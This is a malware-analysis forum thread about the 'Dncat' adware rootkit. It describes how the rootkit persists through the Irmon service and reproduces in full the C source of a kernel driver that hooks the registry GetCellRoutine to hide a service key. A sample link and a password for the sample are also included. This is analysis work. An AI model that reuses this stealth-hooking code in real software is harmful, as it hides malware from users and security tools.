A forum for reverse engineering, OS internals and malware analysis 

Rootkit Dncat

Forum for analysis and discussion about malware.

Rootkit Dncat

 #4061  by EP_X0FF
 Sat Dec 18, 2010 6:04 pm
Drops main body (about 16 Mb of trash) to %Program FIles%\Common Files\ [hexademical random].dat
Runs through Irmon (Infrared Port Monitor) service entry in registry as "ServiceDll".
When service started malware drops and loads rootkit driver to protect itself. Once loaded driver erased from disk.

Named Dncat because of project name located inside driver.
d:\workspace\adware\dncat\hideregkey\objfre_wxp_x86\i386\hrkd.pdb.
Nice driver copy-past.
Code: Select all
typedef PVOID (__stdcall *PGET_CELL_ROUTINE)(PVOID, HANDLE);
PGET_CELL_ROUTINE  OrigGetCellRoutine = NULL; 
PGET_CELL_ROUTINE *OrigGetCellRoutineAddr = NULL; 
PCM_KEY_NODE   g_HideNode = NULL; 
PCM_KEY_NODE   g_LastNode = NULL; 
 
HANDLE OpenKeyByName(PCWSTR pwcsKeyName) 
{ 
   NTSTATUS ntStatus; 
   UNICODE_STRING KeyNameUnicodeString; 
   OBJECT_ATTRIBUTES ObjectAttributes; 
   HANDLE hKey; 
 
   RtlInitUnicodeString(&KeyNameUnicodeString, pwcsKeyName); 
   InitializeObjectAttributes( 
       &ObjectAttributes,  
       &KeyNameUnicodeString,  
       OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE,  
       NULL,  
       NULL); 
    
   ntStatus = ZwOpenKey(&hKey, KEY_READ, &ObjectAttributes); 
   if ( !NT_SUCCESS(ntStatus) ) 
   { 
      DbgPrint("ZwOpenKey Failed: %lx\n", ntStatus); 
      return NULL; 
   } 
   return hKey; 
} 
 
PVOID GetKeyControlBlock(HANDLE hKey) 
{ 
   NTSTATUS ntStatus; 
   PCM_KEY_BODY pKeyBody; 
   PVOID KeyControlBlock; 
 
   if (hKey == NULL)  
   	  return NULL; 
 
   ntStatus = ObReferenceObjectByHandle(hKey,  
       KEY_READ,   //DesiredAccess 
       NULL,       //ObjectType 
       KernelMode, //AccessMode 
       &pKeyBody,  
       NULL); 
   if (!NT_SUCCESS(ntStatus)) 
   { 
      DbgPrint("ObReferenceObjectByHandle Failed: %lx\n", ntStatus); 
      return NULL; 
   } 
 
   KeyControlBlock = pKeyBody->KeyControlBlock; 
   DbgPrint("KeyControlBlock = %lx\n", KeyControlBlock); 
 
   ObDereferenceObject(pKeyBody); 
 
   return KeyControlBlock; 
} 
 
PVOID GetLastKeyNode(PVOID Hive, PCM_KEY_NODE Node) 
{ 
   PCM_KEY_NODE ParentNode = (PCM_KEY_NODE)OrigGetCellRoutine( 
                             Hive, Node->Parent); 
   PCM_KEY_INDEX Index = (PCM_KEY_INDEX)OrigGetCellRoutine( 
                  Hive, ParentNode->SubKeyLists[0]); 
 
   DbgPrint("ParentNode = %lx\nIndex = %lx\n", ParentNode, Index); 
 
   if (Index->Signature == CM_KEY_INDEX_ROOT) 
   { 
      Index = (PCM_KEY_INDEX)OrigGetCellRoutine( 
                 Hive, Index->List[Index->Count-1]); 
      DbgPrint("Index = %lx\n", Index); 
   } 
 
   if ( Index->Signature == CM_KEY_FAST_LEAF ||  
   	    Index->Signature == CM_KEY_HASH_LEAF) 
   { 
      return OrigGetCellRoutine(Hive, Index->List[2*(Index->Count-1)]); 
   } 
   else 
   { 
      return OrigGetCellRoutine(Hive, Index->List[Index->Count-1]); 
   } 
} 
 
PVOID HookGetCellRoutine(PVOID Hive, HANDLE Cell) 
{ 
   PVOID pRet = OrigGetCellRoutine(Hive, Cell); 
   if (pRet) 
   { 
      if (pRet == g_HideNode) 
      { 
         DbgPrint("GetCellRoutine(%lx, %08lx) = %lx\n", Hive, Cell, pRet); 
         pRet = g_LastNode = (PCM_KEY_NODE)GetLastKeyNode( 
                              Hive, g_HideNode); 
         DbgPrint("g_LastNode = %lx\n", g_LastNode); 
         if (pRet == g_HideNode)  
             pRet = NULL; 
      } 
      else if (pRet == g_LastNode) 
      { 
         DbgPrint("GetCellRoutine(%lx, %08lx) = %lx\n", Hive, Cell, pRet); 
         pRet = g_LastNode = NULL; 
      } 
   } 
   return pRet; 
} 
 
VOID Unload(IN PDRIVER_OBJECT  DriverObject)
{ 
  if (OrigGetCellRoutineAddr)  
      *OrigGetCellRoutineAddr = OrigGetCellRoutine; 
   DbgPrint("DriverUnload()\n"); 
} 
 
NTSTATUS DriverEntry(IN PDRIVER_OBJECT  DriverObject, IN PUNICODE_STRING  RegistryPath)
{ 
   ULONG BuildNumber; 
   ULONG KeyHiveOffset; //KeyControlBlock->KeyHive 
   ULONG KeyCellOffset; //KeyControlBlock->KeyCell 
   HANDLE hKey; 
   PVOID KCB, Hive; 
   PWSTR HideKeyName = RegistryPath->Buffer;
 
   DbgPrint("DriverEntry()\n");
   
   DriverObject->DriverUnload = &Unload;

   if (PsGetVersion(NULL, NULL, &BuildNumber, NULL))  
      return STATUS_NOT_SUPPORTED; 


   DbgPrint("BuildNumber = %d\n", BuildNumber); 
 
   switch (BuildNumber) 
   { 
   case 2195: // Win2000 
      KeyHiveOffset = 0xc; 
      KeyCellOffset = 0x10; 
      break; 
   case 2600: // WinXP 
   case 3790: // Win2003 
      KeyHiveOffset = 0x10; 
      KeyCellOffset = 0x14; 
      break; 
   case 6000: //Vista
   case 7600: //Seven
      KeyHiveOffset = 0x14; 
      KeyCellOffset = 0x18; 
      break;
   default: 
      return STATUS_NOT_SUPPORTED; 
   } 
   hKey = OpenKeyByName(HideKeyName);  /* \\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Services\\Irmon */
   KCB = GetKeyControlBlock(hKey); 
   if (KCB) 
   { 
      PHHIVE Hive = (PHHIVE)GET_PTR(KCB, KeyHive); 
       
      OrigGetCellRoutineAddr = &Hive->GetCellRoutine; 
      OrigGetCellRoutine     = Hive->GetCellRoutine; 
      DbgPrint("GetCellRoutine = %lx\n", OrigGetCellRoutine); 
       
      g_HideNode = (PCM_KEY_NODE)OrigGetCellRoutine(Hive,  
                      GET_PTR(KCB, KeyCell)); 
      Hive->GetCellRoutine = HookGetCellRoutine; 
   } 
   ZwClose(hKey); 
    
   return STATUS_SUCCESS; 
}
http://www.virustotal.com/file-scan/rep ... 1292695717
http://www.virustotal.com/file-scan/rep ... 1292695718
Attachments
pass: malware
(342.81 KiB) Downloaded 70 times

Re: Rootkit Dncat

 #4066  by sww
 Sun Dec 19, 2010 6:19 pm
First time this method was found in one Chinese malware. Long time ago (maybe 2 years ago)...
 Return to “Malware”